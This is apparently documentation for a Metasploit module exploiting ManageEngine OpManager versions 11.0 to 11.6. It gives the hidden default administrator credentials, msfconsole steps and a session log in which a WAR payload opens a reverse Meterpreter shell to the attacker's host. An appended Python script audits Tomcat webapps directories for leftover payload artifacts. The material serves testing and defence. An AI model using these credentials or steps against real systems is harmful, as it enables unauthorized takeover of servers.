## Description

This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin", which cannot be reset through the user interface. By logging in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload.

## Vulnerable Application

[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed around "integrated network management". This module has been verified against the following OpManager versions:

* v11.0
* v11.4
* v11.5
* v11.6

Installers:

* [OpManager Installers](http://archives.manageengine.com/opmanager/)

## Verification Steps

1. Start msfconsole
1. `use exploit/windows/http/manage_engine_opmanager_rce`
1. `set RHOST `
1. `exploit`
1. You should get a working Meterpreter session

## Scenarios

### Targeting Windows Server 2012 running OpManager v11.5

```
msf > use exploit/windows/http/manage_engine_opmanager_rce
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit

[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN-SI597APFOFH
OS          : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows
```
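
A defender-side check for the artifact described above, as an added example that is not part of the Metasploit module or its documentation: it audits a Tomcat `webapps` directory against a baseline and flags unexpected WAR files and exploded application directories, including a directory whose WAR has been deleted. The `BASELINE` set, the `oldupload.war` file and the function names are assumptions made for illustration; only the directory name `r63xuE3q1gOAZsCQuJ` comes from the sample output.

```python
import os
import tempfile
import time

# Assumption: names of web apps expected on this host (hypothetical baseline).
BASELINE = {"ROOT", "examples"}

def audit_webapps(webapps_dir, baseline, max_age_hours=24.0, now=None):
    """Flag WAR files and exploded app directories that are not in the baseline."""
    now = time.time() if now is None else now
    entries = list(os.scandir(webapps_dir))
    wars = {e.name[:-4] for e in entries
            if e.is_file() and e.name.lower().endswith(".war")}
    findings = []
    for e in sorted(entries, key=lambda x: x.name):
        is_war = e.is_file() and e.name.lower().endswith(".war")
        if not (is_war or e.is_dir()):
            continue  # loose files are not deployable applications
        app = e.name[:-4] if is_war else e.name
        if app in baseline:
            continue
        findings.append({
            "name": e.name,
            "kind": "war" if is_war else "dir",
            # Modified inside the review window?
            "recent": (now - e.stat().st_mtime) / 3600.0 <= max_age_hours,
            # Exploded directory whose WAR is gone: the leftover the module
            # output warns may need manual cleanup.
            "orphan": (not is_war) and app not in wars,
        })
    return findings

def build_sample(root):
    """Constructed sample tree; only the random name is taken from the page."""
    for d in ("ROOT", "examples", "r63xuE3q1gOAZsCQuJ"):
        os.mkdir(os.path.join(root, d))
    old = os.path.join(root, "oldupload.war")
    with open(old, "wb") as fh:
        fh.write(b"constructed placeholder, not a real archive")
    three_days_ago = time.time() - 72 * 3600
    os.utime(old, (three_days_ago, three_days_ago))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding in audit_webapps(tmp, BASELINE):
            print(finding)
```

On a real host, point `audit_webapps` at the OpManager installation's `tomcat/webapps` directory and build the baseline from a known-good install of the same version.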